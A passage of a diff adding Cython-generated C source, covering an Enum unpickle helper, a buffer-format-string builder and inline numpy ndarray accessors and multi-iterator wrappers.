__Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "BufferFormatFromTypeInfo":1450 + * + * @cname('__pyx_format_from_typeinfo') + * cdef bytes format_from_typeinfo(__Pyx_TypeInfo *type): # <<<<<<<<<<<<<< + * cdef __Pyx_StructField *field + * cdef __pyx_typeinfo_string fmt + */ + +static PyObject *__pyx_format_from_typeinfo(__Pyx_TypeInfo *__pyx_v_type) { + __Pyx_StructField *__pyx_v_field; + struct __pyx_typeinfo_string __pyx_v_fmt; + PyObject *__pyx_v_part = 0; + PyObject *__pyx_v_result = 0; + PyObject *__pyx_v_alignment = NULL; + PyObject *__pyx_v_parts = NULL; + PyObject *__pyx_v_extents = NULL; + Py_ssize_t __pyx_7genexpr__pyx_v_i; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + __Pyx_StructField *__pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + int __pyx_t_7; + int __pyx_t_8; + Py_ssize_t __pyx_t_9; + Py_UCS4 __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("format_from_typeinfo", 0); + + /* "BufferFormatFromTypeInfo":1456 + * cdef Py_ssize_t i + * + * if type.typegroup == 'S': # <<<<<<<<<<<<<< + * assert type.fields != NULL + * assert type.fields.type != NULL + */ + __pyx_t_1 = (__pyx_v_type->typegroup == 'S'); + if (__pyx_t_1) { + + /* "BufferFormatFromTypeInfo":1457 + * + * if type.typegroup == 'S': + * assert type.fields != NULL # <<<<<<<<<<<<<< + * assert type.fields.type != NULL + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_type->fields != NULL); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 1457, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 1457, __pyx_L1_error) + #endif + + /* "BufferFormatFromTypeInfo":1458 + * if type.typegroup == 'S': + * assert type.fields != NULL + * assert type.fields.type != NULL # <<<<<<<<<<<<<< + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_type->fields->type != NULL); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 1458, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 1458, __pyx_L1_error) + #endif + + /* "BufferFormatFromTypeInfo":1460 + * assert type.fields.type != NULL + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: # <<<<<<<<<<<<<< + * alignment = b'^' + * else: + */ + __pyx_t_1 = ((__pyx_v_type->flags & __PYX_BUF_FLAGS_PACKED_STRUCT) != 0); + if (__pyx_t_1) { + + /* "BufferFormatFromTypeInfo":1461 + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: + * alignment = b'^' # <<<<<<<<<<<<<< + * else: + * alignment = b'' + */ + __Pyx_INCREF(__pyx_kp_b__11); + __pyx_v_alignment = __pyx_kp_b__11; + + /* "BufferFormatFromTypeInfo":1460 + * assert type.fields.type != NULL + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: # <<<<<<<<<<<<<< + * alignment = b'^' + * else: + */ + goto __pyx_L4; + } + + /* "BufferFormatFromTypeInfo":1463 + * alignment = b'^' + * else: + * alignment = b'' # <<<<<<<<<<<<<< + * + * parts = [b"T{"] + */ + /*else*/ { + __Pyx_INCREF(__pyx_kp_b_); + __pyx_v_alignment = __pyx_kp_b_; + } + __pyx_L4:; + + /* "BufferFormatFromTypeInfo":1465 + * alignment = b'' + * + * parts = [b"T{"] # <<<<<<<<<<<<<< + * field = type.fields + * + */ + __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1465, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_INCREF(__pyx_kp_b_T); + __Pyx_GIVEREF(__pyx_kp_b_T); + PyList_SET_ITEM(__pyx_t_2, 0, __pyx_kp_b_T); + __pyx_v_parts = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "BufferFormatFromTypeInfo":1466 + * + * parts = [b"T{"] + * field = type.fields # <<<<<<<<<<<<<< + * + * while field.type: + */ + __pyx_t_3 = __pyx_v_type->fields; + __pyx_v_field = __pyx_t_3; + + /* "BufferFormatFromTypeInfo":1468 + * field = type.fields + * + * while field.type: # <<<<<<<<<<<<<< + * part = format_from_typeinfo(field.type) + * parts.append(part + b':' + field.name + b':') + */ + while (1) { + __pyx_t_1 = (__pyx_v_field->type != 0); + if (!__pyx_t_1) break; + + /* "BufferFormatFromTypeInfo":1469 + * + * while field.type: + * part = format_from_typeinfo(field.type) # <<<<<<<<<<<<<< + * parts.append(part + b':' + field.name + b':') + * field += 1 + */ + __pyx_t_2 = __pyx_format_from_typeinfo(__pyx_v_field->type); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_part, ((PyObject*)__pyx_t_2)); + __pyx_t_2 = 0; + + /* "BufferFormatFromTypeInfo":1470 + * while field.type: + * part = format_from_typeinfo(field.type) + * parts.append(part + b':' + field.name + b':') # <<<<<<<<<<<<<< + * field += 1 + * + */ + __pyx_t_2 = PyNumber_Add(__pyx_v_part, __pyx_kp_b__12); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyBytes_FromString(__pyx_v_field->name); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyNumber_Add(__pyx_t_2, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyNumber_Add(__pyx_t_5, __pyx_kp_b__12); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_6 = __Pyx_PyList_Append(__pyx_v_parts, __pyx_t_4); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "BufferFormatFromTypeInfo":1471 + * part = format_from_typeinfo(field.type) + * parts.append(part + b':' + field.name + b':') + * field += 1 # <<<<<<<<<<<<<< + * + * result = alignment.join(parts) + b'}' + */ + __pyx_v_field = (__pyx_v_field + 1); + } + + /* "BufferFormatFromTypeInfo":1473 + * field += 1 + * + * result = alignment.join(parts) + b'}' # <<<<<<<<<<<<<< + * else: + * fmt = __Pyx_TypeInfoToFormat(type) + */ + __pyx_t_4 = __Pyx_PyBytes_Join(__pyx_v_alignment, __pyx_v_parts); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1473, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyNumber_Add(__pyx_t_4, __pyx_kp_b__13); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1473, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_5))||((__pyx_t_5) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_5))) __PYX_ERR(1, 1473, __pyx_L1_error) + __pyx_v_result = ((PyObject*)__pyx_t_5); + __pyx_t_5 = 0; + + /* "BufferFormatFromTypeInfo":1456 + * cdef Py_ssize_t i + * + * if type.typegroup == 'S': # <<<<<<<<<<<<<< + * assert type.fields != NULL + * assert type.fields.type != NULL + */ + goto __pyx_L3; + } + + /* "BufferFormatFromTypeInfo":1475 + * result = alignment.join(parts) + b'}' + * else: + * fmt = __Pyx_TypeInfoToFormat(type) # <<<<<<<<<<<<<< + * result = fmt.string + * if type.arraysize[0]: + */ + /*else*/ { + __pyx_v_fmt = __Pyx_TypeInfoToFormat(__pyx_v_type); + + /* "BufferFormatFromTypeInfo":1476 + * else: + * fmt = __Pyx_TypeInfoToFormat(type) + * result = fmt.string # <<<<<<<<<<<<<< + * if type.arraysize[0]: + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + */ + __pyx_t_5 = __Pyx_PyObject_FromString(__pyx_v_fmt.string); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1476, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_v_result = ((PyObject*)__pyx_t_5); + __pyx_t_5 = 0; + + /* "BufferFormatFromTypeInfo":1477 + * fmt = __Pyx_TypeInfoToFormat(type) + * result = fmt.string + * if type.arraysize[0]: # <<<<<<<<<<<<<< + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + * result = f"({u','.join(extents)})".encode('ascii') + result + */ + __pyx_t_1 = ((__pyx_v_type->arraysize[0]) != 0); + if (__pyx_t_1) { + + /* "BufferFormatFromTypeInfo":1478 + * result = fmt.string + * if type.arraysize[0]: + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] # <<<<<<<<<<<<<< + * result = f"({u','.join(extents)})".encode('ascii') + result + * + */ + { /* enter inner scope */ + __pyx_t_5 = PyList_New(0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1478, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = __pyx_v_type->ndim; + __pyx_t_8 = __pyx_t_7; + for (__pyx_t_9 = 0; __pyx_t_9 < __pyx_t_8; __pyx_t_9+=1) { + __pyx_7genexpr__pyx_v_i = __pyx_t_9; + __pyx_t_4 = __Pyx_PyUnicode_From_size_t((__pyx_v_type->arraysize[__pyx_7genexpr__pyx_v_i]), 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1478, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_5, (PyObject*)__pyx_t_4))) __PYX_ERR(1, 1478, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + } /* exit inner scope */ + __pyx_v_extents = ((PyObject*)__pyx_t_5); + __pyx_t_5 = 0; + + /* "BufferFormatFromTypeInfo":1479 + * if type.arraysize[0]: + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + * result = f"({u','.join(extents)})".encode('ascii') + result # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_9 = 0; + __pyx_t_10 = 127; + __Pyx_INCREF(__pyx_kp_u__14); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__14); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u__14); + __pyx_t_4 = PyUnicode_Join(__pyx_kp_u__15, __pyx_v_extents); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_10 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) > __pyx_t_10) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) : __pyx_t_10; + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u__9); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__9); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__9); + __pyx_t_4 = __Pyx_PyUnicode_Join(__pyx_t_5, 3, __pyx_t_9, __pyx_t_10); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyUnicode_AsASCIIString(((PyObject*)__pyx_t_4)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyNumber_Add(__pyx_t_5, __pyx_v_result); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_4)) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_4))) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_DECREF_SET(__pyx_v_result, ((PyObject*)__pyx_t_4)); + __pyx_t_4 = 0; + + /* "BufferFormatFromTypeInfo":1477 + * fmt = __Pyx_TypeInfoToFormat(type) + * result = fmt.string + * if type.arraysize[0]: # <<<<<<<<<<<<<< + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + * result = f"({u','.join(extents)})".encode('ascii') + result + */ + } + } + __pyx_L3:; + + /* "BufferFormatFromTypeInfo":1481 + * result = f"({u','.join(extents)})".encode('ascii') + result + * + * return result # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "BufferFormatFromTypeInfo":1450 + * + * @cname('__pyx_format_from_typeinfo') + * cdef bytes format_from_typeinfo(__Pyx_TypeInfo *type): # <<<<<<<<<<<<<< + * cdef __Pyx_StructField *field + * cdef __pyx_typeinfo_string fmt + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("BufferFormatFromTypeInfo.format_from_typeinfo", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_part); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_alignment); + __Pyx_XDECREF(__pyx_v_parts); + __Pyx_XDECREF(__pyx_v_extents); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self) { + PyObject *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":248 + * """Returns a borrowed reference to the object owning the data/memory. + * """ + * return PyArray_BASE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_BASE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self) { + PyArray_Descr *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyArray_Descr *__pyx_t_1; + __Pyx_RefNannySetupContext("descr", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":254 + * """Returns an owned reference to the dtype of the array. + * """ + * return PyArray_DESCR(self) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __pyx_t_1 = PyArray_DESCR(__pyx_v_self); + __Pyx_INCREF((PyObject *)((PyArray_Descr *)__pyx_t_1)); + __pyx_r = ((PyArray_Descr *)__pyx_t_1); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self) { + int __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":260 + * """Returns the number of dimensions in the array. + * """ + * return PyArray_NDIM(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_NDIM(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":268 + * Can return NULL for 0-dimensional arrays. + * """ + * return PyArray_DIMS(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_DIMS(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":275 + * The number of elements matches the number of dimensions of the array (ndim). + * """ + * return PyArray_STRIDES(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_STRIDES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self) { + npy_intp __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":281 + * """Returns the total size (in number of elements) of the array. + * """ + * return PyArray_SIZE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_SIZE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self) { + char *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":290 + * of `PyArray_DATA()` instead, which returns a 'void*'. + * """ + * return PyArray_BYTES(self) # <<<<<<<<<<<<<< + * + * ctypedef unsigned char npy_bool + */ + __pyx_r = PyArray_BYTES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew1(PyObject *__pyx_v_a) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew1", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":777 + * + * cdef inline object PyArray_MultiIterNew1(a): + * return PyArray_MultiIterNew(1, a) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew2(a, b): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(1, ((void *)__pyx_v_a)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 777, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew1", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew2(PyObject *__pyx_v_a, PyObject *__pyx_v_b) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew2", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":780 + * + * cdef inline object PyArray_MultiIterNew2(a, b): + * return PyArray_MultiIterNew(2, a, b) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(2, ((void *)__pyx_v_a), ((void *)__pyx_v_b)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 780, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew2", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew3(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew3", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":783 + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + * return PyArray_MultiIterNew(3, a, b, c) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(3, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 783, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* 